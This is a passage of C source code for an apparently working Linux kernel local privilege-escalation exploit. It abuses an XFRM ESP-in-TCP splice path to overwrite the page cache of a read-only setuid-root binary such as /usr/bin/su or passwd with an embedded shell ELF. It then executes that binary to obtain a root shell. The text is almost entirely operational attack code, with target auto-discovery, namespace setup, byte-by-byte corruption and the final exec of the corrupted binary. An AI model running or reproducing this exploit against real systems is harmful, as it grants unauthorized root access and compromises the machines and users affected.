printf(C_BCYN "[*]" C_RESET " %s_write_open_denied=1 errno=%d (%s)\n", label, errno, strerror(errno)); } static int replace_existing_bytes_after(uint64_t byte_off, const unsigned char *desired, size_t desired_len, uint64_t file_size, const struct topology *topo) { uint64_t last = byte_off + desired_len - 1; size_t idx, changed = 0, skipped = 0; uint32_t seq = 1; int max_retries = 8; if (desired_len == 0 || last < byte_off) { fprintf(stderr, "invalid range\n"); return 2; } if (last >= file_size) { fprintf(stderr, "byte range outside target: offset=%llu len=%zu size=%llu\n", (unsigned long long)byte_off, desired_len, (unsigned long long)file_size); return 2; } if (last > file_size - FRAG_LEN) { fprintf(stderr, "range end must be <= size-%d: offset=%llu len=%zu size=%llu\n", FRAG_LEN, (unsigned long long)byte_off, desired_len, (unsigned long long)file_size); return 2; } printf(C_BCYN "[*]" C_RESET " range: offset=0x%llx len=%zu last=0x%llx" " enc_len=%d splice_len=%d\n", (unsigned long long)byte_off, desired_len, (unsigned long long)last, ESP_GCM_ENCRYPTED_LEN, FRAG_LEN); build_stream0_table(); printf(C_BGRN "[+]" C_RESET " stream0 table built\n"); for (idx = 0; idx < desired_len; idx++) { uint64_t off = byte_off + idx; unsigned char current, final, need_stream; struct trigger_params params; int attempt; current = read_byte_at(target_file, off); if (current == desired[idx]) { printf(C_DIM "[-] [%zu/%zu] +%04llx already=%02x skip\n" C_RESET, idx + 1, desired_len, (unsigned long long)off, current); skipped++; continue; } need_stream = current ^ desired[idx]; for (attempt = 0; attempt < max_retries; attempt++) { memset(¶ms, 0, sizeof(params)); params.target_file = target_file; params.splice_offset = (loff_t)off; choose_iv_for_stream0(need_stream, params.esp_iv); params.esp_seq = seq++; params.sender_pid = topo->sender_pid; params.receiver_pid = topo->receiver_pid; printf(C_BCYN "[*]" C_RESET " [%zu/%zu]" " +%04llx " C_RED "%02x" C_RESET " -> " C_BGRN "%02x" C_RESET " xor=" C_CYAN "%02x" C_RESET " seq=%u%s\n", idx + 1, desired_len, (unsigned long long)off, current, desired[idx], need_stream, params.esp_seq, attempt ? " (retry)" : ""); if (run_trigger_pair(¶ms) < 0) { fprintf(stderr, C_BRED "[-] trigger pair failed at index=%zu\n" C_RESET, idx); return 2; } final = read_byte_at(target_file, off); if (final == desired[idx]) { printf(C_BGRN "[+]" C_RESET " smashed %02x -> %02x index=%zu" " offset=+%04llx\n", current, final, idx, (unsigned long long)off); changed++; break; } if (final != current) { fprintf(stderr, C_BRED "[-] byte changed but mismatch" " index=%zu desired=%02x got=%02x\n" C_RESET, idx, desired[idx], final); return 1; } } if (attempt == max_retries) { fprintf(stderr, C_BRED "[-] byte at index=%zu unchanged after %d" " attempts, kernel may be fixed\n" C_RESET, idx, max_retries); return 0; } } printf(C_BCYN "[*]" C_RESET " verifying %zu bytes...\n", desired_len); for (idx = 0; idx < desired_len; idx++) { uint64_t off = byte_off + idx; unsigned char final = read_byte_at(target_file, off); if (final != desired[idx]) { fprintf(stderr, C_BRED "[-] verify mismatch index=%zu" " offset=%llu desired=%02x got=%02x\n" C_RESET, idx, (unsigned long long)off, desired[idx], final); return 1; } } printf(C_BCYN "[*]" C_RESET " summary: len=%zu changed=" C_BGRN "%zu" C_RESET " skipped=" C_DIM "%zu" C_RESET "\n", desired_len, changed, skipped); if (changed == 0) { fprintf(stderr, "all bytes already had desired values\n"); return 2; } printf(C_BGRN "[+]" C_RESET " BUG: overwrote read-only page-cache bytes\n"); return 1; } static const char *find_suid_target(void) { static const char *candidates[] = { "/usr/bin/su", "/bin/su", "/usr/bin/mount", "/usr/bin/passwd", "/usr/bin/chsh", NULL }; for (int i = 0; candidates[i]; i++) { struct stat sb; if (stat(candidates[i], &sb) == 0 && (sb.st_mode & S_ISUID) && sb.st_uid == 0 && sb.st_size >= FRAG_LEN && access(candidates[i], R_OK) == 0) return candidates[i]; } return NULL; } static void backup_target(const char *path) { const char *base = strrchr(path, '/'); base = base ? base + 1 : path; snprintf(backup_path, sizeof(backup_path), "/tmp/.%s_%d", base, getpid()); int src = open(path, O_RDONLY); int dst = open(backup_path, O_WRONLY | O_CREAT | O_TRUNC, 0600); if (src >= 0 && dst >= 0) { char buf[4096]; ssize_t n; while ((n = read(src, buf, sizeof(buf))) > 0) write(dst, buf, n); } if (src >= 0) close(src); if (dst >= 0) close(dst); printf(C_BCYN "[*]" C_RESET " backup: %s\n", backup_path); } int main(int argc, char **argv) { const char *target_path; uint64_t file_size; pid_t exploit_child; int status; setvbuf(stdout, NULL, _IONBF, 0); printf(C_BCYN "[*]" C_RESET " uid=%d euid=%d gid=%d egid=%d\n", getuid(), geteuid(), getgid(), getegid()); /* 1. Target selection: explicit arg, or auto-discover SUID binary */ if (argc > 1) { target_path = argv[1]; } else { target_path = find_suid_target(); if (!target_path) { fprintf(stderr, C_BRED "[-]" C_RESET " no readable setuid-root binary found\n"); return 2; } } file_size = use_existing_target(target_path); printf(C_BCYN "[*]" C_RESET " target=%s size=%llu\n", target_file, (unsigned long long)file_size); /* 2. Prove we cannot write */ verify_write_denied("outer"); /* 3. Backup the target so the root shell can restore it */ backup_target(target_file); /* 4. mmap the target page cache for fast byte reads */ target_rfd = open(target_file, O_RDONLY); if (target_rfd >= 0) target_map = mmap(NULL, file_size, PROT_READ, MAP_SHARED, target_rfd, 0); /* * 5. Fork before entering user namespace. SUID execve only * works from the init user namespace. */ exploit_child = fork(); if (exploit_child < 0) die("fork exploit child"); if (exploit_child == 0) { struct topology topo; int ns_middle_fd, ns_fd, ret; if (setup_topology(&topo) < 0) die("setup_topology"); printf(C_BGRN "[+]" C_RESET " topology ready: sender_pid=%d receiver_pid=%d\n", topo.sender_pid, topo.receiver_pid); ns_middle_fd = open("/proc/self/ns/net", O_RDONLY | O_CLOEXEC); if (ns_middle_fd < 0) die("save ns_middle fd"); ns_fd = open_ns_fd(topo.receiver_pid); if (ns_fd < 0) die("open_ns_fd receiver"); if (setns(ns_fd, CLONE_NEWNET) < 0) die("setns to ns_receiver"); close(ns_fd); add_xfrm_espintcp_sa(); printf(C_BGRN "[+]" C_RESET " XFRM ESP-in-TCP SA installed\n"); if (setns(ns_middle_fd, CLONE_NEWNET) < 0) die("setns back to ns_middle"); close(ns_middle_fd); verify_write_denied("userns"); printf(C_BCYN "[*]" C_RESET " overwriting %d bytes of page cache...\n", PAYLOAD_LEN); ret = replace_existing_bytes_after(0, SHELL_ELF, PAYLOAD_LEN, file_size, &topo); _exit(ret); } /* parent: wait for exploit child, then launch SUID binary */ if (waitpid(exploit_child, &status, 0) < 0) die("waitpid exploit child"); if (target_map != MAP_FAILED) munmap(target_map, file_size); if (target_rfd >= 0) close(target_rfd); if (!WIFEXITED(status)) { fprintf(stderr, C_BRED "[-]" C_RESET " exploit child killed by signal %d\n", WIFSIGNALED(status) ? WTERMSIG(status) : -1); unlink(backup_path); return 2; } int ret = WEXITSTATUS(status); if (ret == 1) { printf(C_BGRN "[+]" C_RESET " page cache corrupted, launching %s\n", target_file); printf(C_BCYN "[*]" C_RESET " restore: cp %s %s\n", backup_path, target_file); fflush(stdout); execlp(target_file, target_file, (char *)NULL); die("execve"); } unlink(backup_path); if (ret == 0) printf(C_BCYN "[*]" C_RESET " kernel appears fixed (bytes unchanged)\n"); else printf(C_BRED "[-]" C_RESET " exploit failed (code %d)\n", ret); return ret; }